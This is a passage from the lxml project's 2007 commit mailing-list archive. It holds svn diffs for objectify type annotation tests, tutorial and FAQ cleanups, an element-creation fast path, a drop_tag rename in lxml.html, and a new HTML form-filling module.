are among the keyword arguments, they will be used instead. """ - cdef _Element element if attrib is not None: if python.PyDict_Size(_attributes): attrib.update(_attributes) @@ -1581,7 +1643,10 @@ if _xsi is not None: python.PyDict_SetItem(_attributes, XML_SCHEMA_INSTANCE_TYPE_ATTR, _xsi) if _pytype is None: - _pytype = _SCHEMA_TYPE_DICT[_xsi].name + # allow for s.o. using unregistered or even wrong xsi:type names + pytype_lookup = _SCHEMA_TYPE_DICT.get(_xsi) + if pytype_lookup is not None: + _pytype = pytype_lookup.name if python._isString(_value): strval = _value Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Wed Jun 13 14:48:21 2007 @@ -13,6 +13,10 @@ from lxml import objectify +XML_SCHEMA_INSTANCE_NS = "http://www.w3.org/2001/XMLSchema-instance" +XML_SCHEMA_INSTANCE_TYPE_ATTR = "{%s}type" % XML_SCHEMA_INSTANCE_NS +XML_SCHEMA_NIL_ATTR = "{%s}nil" % XML_SCHEMA_INSTANCE_NS + xml_str = '''\ @@ -28,7 +32,7 @@ """Test cases for lxml.objectify """ etree = etree - + def XML(self, xml): return self.etree.XML(xml, self.parser) @@ -356,20 +360,69 @@ XML = self.XML root = XML('''\ - 5 - 5 - 5 + true + false + 1 + 0 + + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + + ''') - self.assert_(isinstance(root.a[0], objectify.IntElement)) - self.assertEquals(5, root.a[0]) - - self.assert_(isinstance(root.a[1], objectify.StringElement)) - self.assertEquals("5", root.a[1]) - - self.assert_(isinstance(root.a[2], objectify.FloatElement)) - self.assertEquals(5.0, root.a[2]) + for b in root.b: + self.assert_(isinstance(b, objectify.BoolElement)) + self.assertEquals(True, root.b[0]) + self.assertEquals(False, root.b[1]) + self.assertEquals(True, root.b[2]) + self.assertEquals(False, root.b[3]) + + for f in root.f: + self.assert_(isinstance(f, objectify.FloatElement)) + self.assertEquals(5, f) + + for s in root.s: + self.assert_(isinstance(s, objectify.StringElement)) + self.assertEquals("5", s) + + for l in root.l: + self.assert_(isinstance(l, objectify.LongElement)) + self.assertEquals(5l, l) + + for i in root.i: + self.assert_(isinstance(i, objectify.IntElement)) + self.assertEquals(5, i) + + self.assert_(isinstance(root.n, objectify.NoneElement)) + self.assertEquals(None, root.n) def test_type_str_sequence(self): XML = self.XML @@ -444,10 +497,11 @@ root.b = False self.assertFalse(root.b) - def test_type_annotation(self): + def test_pytype_annotation(self): XML = self.XML root = XML(u'''\ - + 5 test 1.1 @@ -456,6 +510,11 @@ 5 + 5 + 23 + 42 + 300 + 2 ''') objectify.annotate(root) @@ -470,6 +529,125 @@ self.assertEquals("none", child_types[5]) self.assertEquals(None, child_types[6]) self.assertEquals("float", child_types[7]) + self.assertEquals("float", child_types[8]) + self.assertEquals("str", child_types[9]) + self.assertEquals("int", child_types[10]) + self.assertEquals("int", child_types[11]) + self.assertEquals("int", child_types[12]) + + self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + + def test_pytype_annotation_use_old(self): + XML = self.XML + root = XML(u'''\ + + 5 + test + 1.1 + \uF8D2 + true + + + 5 + 5 + 23 + 42 + 300 + 2 + + ''') + objectify.annotate(root, ignore_old=False) + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals("int", child_types[0]) + self.assertEquals("str", child_types[1]) + self.assertEquals("float", child_types[2]) + self.assertEquals("str", child_types[3]) + self.assertEquals("bool", child_types[4]) + self.assertEquals("none", child_types[5]) + self.assertEquals(None, child_types[6]) + self.assertEquals("float", child_types[7]) + self.assertEquals("float", child_types[8]) + self.assertEquals("str", child_types[9]) + self.assertEquals("str", child_types[10]) + self.assertEquals("float", child_types[11]) + self.assertEquals("long", child_types[12]) + + self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + + def test_deannotate(self): + XML = self.XML + root = XML(u'''\ + + 5 + test + 1.1 + \uF8D2 + true + + + 5 + 5 + 23 + 42 + 300 + 2 + + ''') + objectify.deannotate(root) + + for c in root.getiterator(): + self.assertEquals(None, c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR)) + self.assertEquals(None, c.get(objectify.PYTYPE_ATTRIBUTE)) + + self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + + def test_xsitype_deannotate(self): + XML = self.XML + root = XML(u'''\ + + 5 + test + 1.1 + \uF8D2 + true + + + 5 + 5 + 23 + 42 + 300 + 2 + + ''') + objectify.annotate(root) + objectify.deannotate(root, pytype=False) + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals("int", child_types[ 0]) + self.assertEquals("str", child_types[ 1]) + self.assertEquals("float", child_types[ 2]) + self.assertEquals("str", child_types[ 3]) + self.assertEquals("bool", child_types[ 4]) + self.assertEquals("none", child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("float", child_types[ 7]) + self.assertEquals("float", child_types[ 8]) + self.assertEquals("str", child_types[ 9]) + self.assertEquals("int", child_types[10]) + self.assertEquals("int", child_types[11]) + self.assertEquals("int", child_types[12]) + + self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + + for c in root.getiterator(): + self.assertEquals(None, c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR)) def test_change_pytype_attribute(self): XML = self.XML @@ -890,7 +1068,6 @@ etree.tostring(new_root), etree.tostring(root)) - def test_suite(): suite = unittest.TestSuite() suite.addTests([unittest.makeSuite(ObjectifyTestCase)]) From scoder at codespeak.net Wed Jun 13 19:25:26 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:25:26 +0200 (CEST) Subject: [Lxml-checkins] r44232 - lxml/branch/lxml-1.3/doc Message-ID: <20070613172526.67E6A8208@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:25:25 2007 New Revision: 44232 Added: lxml/branch/lxml-1.3/doc/tutorial.txt - copied unchanged from r44231, lxml/trunk/doc/tutorial.txt Log: copied over the tutorial From scoder at codespeak.net Wed Jun 13 19:32:26 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:32:26 +0200 (CEST) Subject: [Lxml-checkins] r44233 - lxml/branch/lxml-1.3/doc Message-ID: <20070613173226.182B681C8@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:32:25 2007 New Revision: 44233 Modified: lxml/branch/lxml-1.3/doc/tutorial.txt Log: cleaned up tutorial Modified: lxml/branch/lxml-1.3/doc/tutorial.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/tutorial.txt (original) +++ lxml/branch/lxml-1.3/doc/tutorial.txt Wed Jun 13 19:32:25 2007 @@ -327,35 +327,3 @@ tree: children, parents (or rather ancestors) and siblings. .. _`further iterators`: api.html#iteration - - -The ElementTree class -===================== - -An ``ElementTree`` is mainly a wrapper around a tree with a root node. - - -Parsing files and XML literals -============================== - -The XML() function ------------------- - -The parse() function --------------------- - -Namespaces -========== - - -ElementPath -=========== - -findall() ---------- - -find() ------- - -findtext() ----------- From scoder at codespeak.net Wed Jun 13 19:33:20 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:33:20 +0200 (CEST) Subject: [Lxml-checkins] r44234 - lxml/branch/lxml-1.3/doc Message-ID: <20070613173320.07C2081ED@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:33:20 2007 New Revision: 44234 Modified: lxml/branch/lxml-1.3/doc/tutorial.txt Log: cleaned up tutorial Modified: lxml/branch/lxml-1.3/doc/tutorial.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/tutorial.txt (original) +++ lxml/branch/lxml-1.3/doc/tutorial.txt Wed Jun 13 19:33:20 2007 @@ -69,7 +69,7 @@ The Element class -================= +----------------- An ``Element`` is the main container object for the ElementTree API. Most of the XML tree functionality is accessed through this class. Elements are From scoder at codespeak.net Wed Jun 13 19:33:42 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:33:42 +0200 (CEST) Subject: [Lxml-checkins] r44235 - lxml/branch/lxml-1.3/src/lxml/tests Message-ID: <20070613173342.D203581ED@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:33:42 2007 New Revision: 44235 Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Log: run doctests from tutorial Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Wed Jun 13 19:33:42 2007 @@ -1591,6 +1591,8 @@ suite.addTests( [doctest.DocFileSuite('../../../doc/api.txt')]) suite.addTests( + [doctest.DocFileSuite('../../../doc/tutorial.txt')]) + suite.addTests( [doctest.DocFileSuite('../../../doc/parsing.txt')]) suite.addTests( [doctest.DocFileSuite('../../../doc/resolvers.txt')]) From scoder at codespeak.net Wed Jun 13 19:34:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:34:24 +0200 (CEST) Subject: [Lxml-checkins] r44236 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070613173424.3280E81ED@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:34:23 2007 New Revision: 44236 Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/etree_defs.h lxml/branch/lxml-1.3/src/lxml/python.pxd Log: merged in fast path for Element instantiation from trunk Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Wed Jun 13 19:34:23 2007 @@ -1038,6 +1038,10 @@ else: ELEMENT_CREATION_LOCK = NULL +cdef extern from "etree_defs.h": + # macro call to 't->tp_new()' for fast instantiation + cdef _Element NEW_ELEMENT "PY_NEW" (object t) + cdef _Element _elementFactory(_Document doc, xmlNode* c_node): cdef python.PyThreadState* state cdef _Element result @@ -1056,9 +1060,13 @@ python.PyThread_release_lock(ELEMENT_CREATION_LOCK) return result - element_class = LOOKUP_ELEMENT_CLASS(ELEMENT_CLASS_LOOKUP_STATE, - doc, c_node) - result = element_class() + element_class = LOOKUP_ELEMENT_CLASS( + ELEMENT_CLASS_LOOKUP_STATE, doc, c_node) + if element_class is _Element: + # fast path for standard _Element class + result = NEW_ELEMENT(_Element) + else: + result = element_class() result._doc = doc result._c_node = c_node registerProxy(result) @@ -1066,7 +1074,8 @@ if config.ENABLE_THREADING: python.PyThread_release_lock(ELEMENT_CREATION_LOCK) - result._init() + if element_class is not _Element: + result._init() return result Modified: lxml/branch/lxml-1.3/src/lxml/etree_defs.h ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree_defs.h (original) +++ lxml/branch/lxml-1.3/src/lxml/etree_defs.h Wed Jun 13 19:34:23 2007 @@ -64,6 +64,16 @@ #define iter(o) PyObject_GetIter(o) #define _cstr(s) PyString_AS_STRING(s) +static PyObject* __PY_NEW_GLOBAL_EMPTY_TUPLE = NULL; + +#define PY_NEW(T) \ + (((PyTypeObject*)(T))->tp_new( \ + (PyTypeObject*)(T), \ + ((__PY_NEW_GLOBAL_EMPTY_TUPLE == NULL) ? \ + (__PY_NEW_GLOBAL_EMPTY_TUPLE = PyTuple_New(0)) : \ + (__PY_NEW_GLOBAL_EMPTY_TUPLE)), \ + NULL)) + #define _isString(obj) PyObject_TypeCheck(obj, &PyBaseString_Type) #define _isElement(c_node) \ Modified: lxml/branch/lxml-1.3/src/lxml/python.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/python.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/python.pxd Wed Jun 13 19:34:23 2007 @@ -112,3 +112,4 @@ cdef object repr(object obj) cdef object iter(object obj) cdef char* _cstr(object s) + cdef object PY_NEW(object t) From scoder at codespeak.net Wed Jun 13 19:36:29 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:36:29 +0200 (CEST) Subject: [Lxml-checkins] r44237 - lxml/branch/lxml-1.3/doc Message-ID: <20070613173629.DB12A81ED@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:36:29 2007 New Revision: 44237 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt Log: ReST fix Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Wed Jun 13 19:36:29 2007 @@ -96,16 +96,16 @@ * Try to use versions of both libraries that were released together. * If you use XML Schema or Schematron which are still under development, the -most recent version of libxml2 is usually a good bet. + most recent version of libxml2 is usually a good bet. * The same applies to XPath, where a substantial number of bugs and memory -leaks were fixed over time. If you encounter crashes or memory leaks in XPath -applications, try a more recent version of libxml2. + leaks were fixed over time. If you encounter crashes or memory leaks in XPath + applications, try a more recent version of libxml2. * For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. * For the normal tree handling, however, any libxml2 version starting with -2.6.16 should do. + 2.6.16 should do. Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to see if a specific bug has been fixed. From scoder at codespeak.net Wed Jun 13 19:48:37 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:48:37 +0200 (CEST) Subject: [Lxml-checkins] r44238 - lxml/branch/lxml-1.3/doc Message-ID: <20070613174837.8DACC820F@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:48:37 2007 New Revision: 44238 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt Log: link to the tutorial from the FAQ and make clear we appreciate any help here Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Wed Jun 13 19:48:37 2007 @@ -46,10 +46,16 @@ Is there a tutorial? -------------------- -There is a `tutorial for ElementTree`_ which also works for ``lxml.etree``. +Read the `lxml.etree Tutorial`_. While this is still work in progress (just +as any good documentation), it provides an overview of the most important +concepts in ``lxml.etree``. If you want to help out, the tutorial is a very +good place to start. + +There is also a `tutorial for ElementTree`_ which works for ``lxml.etree``. The `API documentation`_ also contains many examples for ``lxml.etree``. To learn using ``lxml.objectify``, read the `objectify documentation`_. +.. _`lxml.etree Tutorial`: tutorial.html .. _`tutorial for ElementTree`: http://effbot.org/zone/element.htm .. _`API documentation`: api.html .. _`objectify documentation`: objectify.html @@ -251,6 +257,11 @@ .. _ReST: http://docutils.sourceforge.net/rst.html .. _`text files`: http://codespeak.net/svn/lxml/trunk/doc/ +* help with the tutorial. A tutorial is the most important stating point for + new users, so it is important for us to provide an easy to understand guide + into lxml. As allo documentation, the tutorial is work in progress, so we + appreciate every helping hand. + * improve the docstrings. lxml uses docstrings to support Python's integrated online ``help()`` function. However, sometimes these are not sufficient to grasp the details of the function in question. If you find such a place, From scoder at codespeak.net Wed Jun 13 19:49:32 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:49:32 +0200 (CEST) Subject: [Lxml-checkins] r44239 - lxml/trunk/doc Message-ID: <20070613174932.7A01E8210@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:49:32 2007 New Revision: 44239 Modified: lxml/trunk/doc/FAQ.txt Log: link to the tutorial from the FAQ and make clear we appreciate any help here Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Wed Jun 13 19:49:32 2007 @@ -51,10 +51,16 @@ Is there a tutorial? -------------------- -There is a `tutorial for ElementTree`_ which also works for ``lxml.etree``. +Read the `lxml.etree Tutorial`_. While this is still work in progress (just +as any good documentation), it provides an overview of the most important +concepts in ``lxml.etree``. If you want to help out, the tutorial is a very +good place to start. + +There is also a `tutorial for ElementTree`_ which works for ``lxml.etree``. The `API documentation`_ also contains many examples for ``lxml.etree``. To learn using ``lxml.objectify``, read the `objectify documentation`_. +.. _`lxml.etree Tutorial`: tutorial.html .. _`tutorial for ElementTree`: http://effbot.org/zone/element.htm .. _`API documentation`: api.html .. _`objectify documentation`: objectify.html @@ -256,6 +262,11 @@ .. _ReST: http://docutils.sourceforge.net/rst.html .. _`text files`: http://codespeak.net/svn/lxml/trunk/doc/ +* help with the tutorial. A tutorial is the most important stating point for + new users, so it is important for us to provide an easy to understand guide + into lxml. As allo documentation, the tutorial is work in progress, so we + appreciate every helping hand. + * improve the docstrings. lxml uses docstrings to support Python's integrated online ``help()`` function. However, sometimes these are not sufficient to grasp the details of the function in question. If you find such a place, From scoder at codespeak.net Wed Jun 13 19:58:05 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:58:05 +0200 (CEST) Subject: [Lxml-checkins] r44240 - lxml/branch/lxml-1.3/doc Message-ID: <20070613175805.C0EAC8215@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:58:05 2007 New Revision: 44240 Modified: lxml/branch/lxml-1.3/doc/tutorial.txt Log: updated toc in tutorial Modified: lxml/branch/lxml-1.3/doc/tutorial.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/tutorial.txt (original) +++ lxml/branch/lxml-1.3/doc/tutorial.txt Wed Jun 13 19:58:05 2007 @@ -13,17 +13,11 @@ .. contents:: .. - 1 Elements and ElementTrees - 1.1 The Element class - 1.2 The ElementTree class - 2 Parsing and XML literals - 2.1 The XML() function - 2.2 The parse() function - 3 Namespaces - 4 The find*() methods - 4.1 findall() - 4.2 find() - 4.3 findtext() + 1 The Element class + 2 Elements are lists + 3 Elements carry attributes + 4 Elements contain text + 5 Tree iteration A common way to import ``lxml.etree`` is as follows:: From scoder at codespeak.net Wed Jun 13 21:16:10 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 21:16:10 +0200 (CEST) Subject: [Lxml-checkins] r44241 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070613191610.EA5F08210@code0.codespeak.net> Author: scoder Date: Wed Jun 13 21:16:09 2007 New Revision: 44241 Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/diff.py lxml/branch/html/src/lxml/html/tests/test_basic.txt Log: renamed drop_element() back to drop_tag() Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Wed Jun 13 21:16:09 2007 @@ -35,7 +35,7 @@ previous.tail = (previous.tail or '') + self.tail parent.remove(self) - def drop_element(self): + def drop_tag(self): """ Remove the tag, but not its children or text. The children and text are merged into the parent. @@ -43,7 +43,7 @@ Example:: >>> h = parse_element('
Hello World!
') - >>> h.find('//b').drop_element() + >>> h.find('//b').drop_tag() >>> print tostring(h)
Hello World!
""" Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Wed Jun 13 21:16:09 2007 @@ -290,7 +290,7 @@ for el in _kill: el.drop_tree() for el in _remove: - el.drop_element() + el.drop_tag() if remove_unknown_tags: if allow_tags: @@ -304,7 +304,7 @@ bad.append(el) if strip_tags: for el in bad: - el.drop_element() + el.drop_tag() else: for el in bad: el.drop_tree() Modified: lxml/branch/html/src/lxml/html/diff.py ============================================================================== --- lxml/branch/html/src/lxml/html/diff.py (original) +++ lxml/branch/html/src/lxml/html/diff.py Wed Jun 13 21:16:09 2007 @@ -770,7 +770,7 @@ if not _contains_block_level_tag(el): continue _move_el_inside_block(el, tag=tag) - el.drop_element() + el.drop_tag() #_merge_element_contents(el) def _contains_block_level_tag(el): Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_basic.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_basic.txt Wed Jun 13 21:16:09 2007 @@ -63,7 +63,7 @@ ...
footer
... ... ''') - >>> doc.get_element_by_id('link').drop_element() + >>> doc.get_element_by_id('link').drop_tag() >>> print tostring(doc) From scoder at codespeak.net Thu Jun 14 07:49:02 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 14 Jun 2007 07:49:02 +0200 (CEST) Subject: [Lxml-checkins] r44244 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070614054902.BF650822E@code0.codespeak.net> Author: scoder Date: Thu Jun 14 07:49:01 2007 New Revision: 44244 Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/tests/test_basic.txt Log: prevent comment text from being merged into the document in drop_tag() Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Thu Jun 14 07:49:01 2007 @@ -50,7 +50,8 @@ parent = self.getparent() assert parent is not None previous = self.getprevious() - if self.text: + if self.text and isinstance(self.tag, basestring): + # not a Comment, etc. if previous is None: parent.text = (parent.text or '') + self.text else: Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_basic.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_basic.txt Thu Jun 14 07:49:01 2007 @@ -1,5 +1,6 @@ lxml.html adds a find_class method to elements:: + >>> from lxml.etree import Comment >>> from lxml.html import HTML, tostring, parse_element >>> from lxml.html.clean import clean, clean_html >>> from lxml.html import usedoctest @@ -60,6 +61,7 @@ ...
... This is a test of stuff. ...
+ ... ...
footer
... ... ''') @@ -70,6 +72,7 @@
This is a test of stuff.
+
footer
@@ -77,6 +80,19 @@ >>> print tostring(doc) + +
footer
+ + + +Note, however, that comment text will not be merged into the tree when you +drop the comment. Here, ``drop_tag()`` behaves exactly like ``drop_tree()``: + + >>> for comment in doc.getiterator(Comment): + ... comment.drop_tag() + >>> print tostring(doc) + +
footer
From scoder at codespeak.net Thu Jun 14 08:04:56 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 14 Jun 2007 08:04:56 +0200 (CEST) Subject: [Lxml-checkins] r44245 - lxml/branch/html/src/lxml Message-ID: <20070614060456.71FA7822D@code0.codespeak.net> Author: scoder Date: Thu Jun 14 08:04:55 2007 New Revision: 44245 Modified: lxml/branch/html/src/lxml/classlookup.pxi Log: copy'n'paste bug Modified: lxml/branch/html/src/lxml/classlookup.pxi ============================================================================== --- lxml/branch/html/src/lxml/classlookup.pxi (original) +++ lxml/branch/html/src/lxml/classlookup.pxi Thu Jun 14 08:04:55 2007 @@ -122,8 +122,8 @@ if entity is None: self.entity_class = None - elif issubclass(pi, EntityBase): - self.entity_class = pi + elif issubclass(entity, EntityBase): + self.entity_class = entity else: raise TypeError, "Entity class must be subclass of EntityBase" From scoder at codespeak.net Thu Jun 14 08:06:52 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 14 Jun 2007 08:06:52 +0200 (CEST) Subject: [Lxml-checkins] r44246 - lxml/trunk/src/lxml Message-ID: <20070614060652.4B0EF822D@code0.codespeak.net> Author: scoder Date: Thu Jun 14 08:06:51 2007 New Revision: 44246 Modified: lxml/trunk/src/lxml/classlookup.pxi Log: copy'n'paste bug Modified: lxml/trunk/src/lxml/classlookup.pxi ============================================================================== --- lxml/trunk/src/lxml/classlookup.pxi (original) +++ lxml/trunk/src/lxml/classlookup.pxi Thu Jun 14 08:06:51 2007 @@ -122,8 +122,8 @@ if entity is None: self.entity_class = None - elif issubclass(pi, EntityBase): - self.entity_class = pi + elif issubclass(entity, EntityBase): + self.entity_class = entity else: raise TypeError, "Entity class must be subclass of EntityBase" From scoder at codespeak.net Thu Jun 14 08:07:23 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 14 Jun 2007 08:07:23 +0200 (CEST) Subject: [Lxml-checkins] r44247 - lxml/branch/html/src/lxml/html Message-ID: <20070614060723.B4584822E@code0.codespeak.net> Author: scoder Date: Thu Jun 14 08:07:23 2007 New Revision: 44247 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: support entities Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Thu Jun 14 08:07:23 2007 @@ -272,9 +272,13 @@ class HtmlProcessingInstruction(etree.PIBase, HtmlMixin): pass +class HtmlEntity(etree.EntityBase, HtmlMixin): + pass + html_parser = etree.HTMLParser() html_parser.setElementClassLookup(etree.ElementDefaultClassLookup( - element=HtmlElement, comment=HtmlComment, pi=HtmlProcessingInstruction)) + element=HtmlElement, comment=HtmlComment, + pi=HtmlProcessingInstruction, entity=HtmlEntity)) def HTML(html): # FIXME: should this notice a fragment and parse accordingly? From ianb at codespeak.net Fri Jun 15 00:04:12 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 15 Jun 2007 00:04:12 +0200 (CEST) Subject: [Lxml-checkins] r44252 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070614220412.32475827B@code0.codespeak.net> Author: ianb Date: Fri Jun 15 00:04:11 2007 New Revision: 44252 Added: lxml/branch/html/src/lxml/html/formfill.py lxml/branch/html/src/lxml/html/tests/test_formfill.py lxml/branch/html/src/lxml/html/tests/test_formfill.txt Log: Added a form filling module; not fully tested yet Added: lxml/branch/html/src/lxml/html/formfill.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/formfill.py Fri Jun 15 00:04:11 2007 @@ -0,0 +1,166 @@ +from lxml.etree import XPath +from lxml.html import HTML, tostring + +__all__ = ['FormNotFound', 'fill_form'] + +class FormNotFound(LookupError): + """ + Raised when no form can be found + """ + +_form_name_xpath = XPath('descendant-or-self::form[name=$name]') +_input_xpath = XPath('descendant-or-self::input | descendant-or-self::select | descendant-or-self::textarea') + +def fill_form( + el, + values, + form_id=None, + form_index=None, + ): + el = _find_form(el, form_id=form_id, form_index=form_index) + _fill_form(el, values) + +def fill_form_html(html, values, form_id=None, form_index=None): + if isinstance(html, basestring): + doc = HTML(html) + return_string = True + else: + doc = copy.deepcopy(html) + return_string = False + fill_form(doc, values, form_id=form_id, form_index=form_index) + if return_string: + return tostring(doc) + else: + return doc + +def _fill_form(el, values): + counts = {} + if hasattr(values, 'mixed'): + # For Paste request parameters + values = values.mixed() + inputs = _input_xpath(el) + for input in inputs: + name = input.get('name') + if not name: + continue + if _takes_multiple(input): + value = values.get(name, []) + if not isinstance(value, (list, tuple)): + value = [value] + _fill_multiple(input, value) + elif name not in values: + continue + else: + index = counts.get(name, 0) + counts[name] = index + 1 + value = values[name] + if isinstance(value, (list, tuple)): + try: + value = value[index] + except IndexError: + continue + elif index > 0: + continue + _fill_single(input, value) + +def _takes_multiple(input): + if input.tag == 'select' and input.get('multiple'): + # FIXME: multiple="0"? + return True + type = input.get('type', '').lower() + if type in ('radio', 'checkbox'): + return True + return False + +def _fill_multiple(input, value): + type = input.get('type', '').lower() + if type == 'checkbox': + v = input.get('value') + if v is None: + if not value: + result = False + else: + result = value[0] + if isinstance(value, basestring): + # The only valid "on" value for an unnamed checkbox is 'on' + result = result == 'on' + _check(input, result) + else: + _check(input, v in value) + elif type == 'radio': + v = input.get('value') + _check(input, v in value) + else: + assert input.tag == 'select' + for option in input.findall('option'): + v = option.get('value') + if v is None: + # This seems to be the default, at least on IE + # FIXME: but I'm not sure + v = option.text_content() + _select(option, v in value) + +def _check(el, check): + if check: + el.set('checked', '') + else: + if 'checked' in el.attrib: + del el.attrib['checked'] + +def _select(el, select): + if select: + el.set('selected', '') + else: + if 'selected' in el.attrib: + del el.attrib['selected'] + +def _fill_single(input, value): + if input.tag == 'textarea': + input.clear() + input.text = value + else: + input.set('value', value) + +def _find_form(el, form_id=None, form_index=None): + if form_id is None and form_index is None: + forms = el.getiterator('form') + for form in forms: + return form + raise FormNotFound( + "No forms in page") + if form_id is not None: + form = el.get_element_by_id(form_id) + if form is not None: + return form + forms = _form_name_xpath(el, name=form_id) + if forms: + return forms[0] + else: + raise FormNotFound( + "No form with the name or id of %r (forms: %s)" + % (id, ', '.join(_find_form_ids(el)))) + if form_index is not None: + forms = el.getiterator('form') + try: + return forms[form_index] + except IndexError: + raise FormNotFound( + "There is no form with the index %r (%i forms found)" + % (form_index, len(forms))) + +def _find_form_ids(el): + forms = el.getiterator('form') + if not forms: + yield '(no forms)' + return + for index, form in enumerate(forms): + if form.get('id'): + if form.get('name'): + yield '%s or %s' % (form.get('id'), + form.get('name')) + else: + yield form.get('id') + elif form.get('name'): + yield form.get('name') + else: + yield '(unnamed form %s)' % index Added: lxml/branch/html/src/lxml/html/tests/test_formfill.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_formfill.py Fri Jun 15 00:04:11 2007 @@ -0,0 +1,7 @@ +import unittest +from lxml.tests.common_imports import doctest + +def test_suite(): + suite = unittest.TestSuite() + suite.addTests([doctest.DocFileSuite('test_formfill.txt')]) + return suite Added: lxml/branch/html/src/lxml/html/tests/test_formfill.txt ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_formfill.txt Fri Jun 15 00:04:11 2007 @@ -0,0 +1,54 @@ +Some basic imports: + + >>> from lxml.html import usedoctest + >>> from lxml.html.formfill import fill_form_html + +The 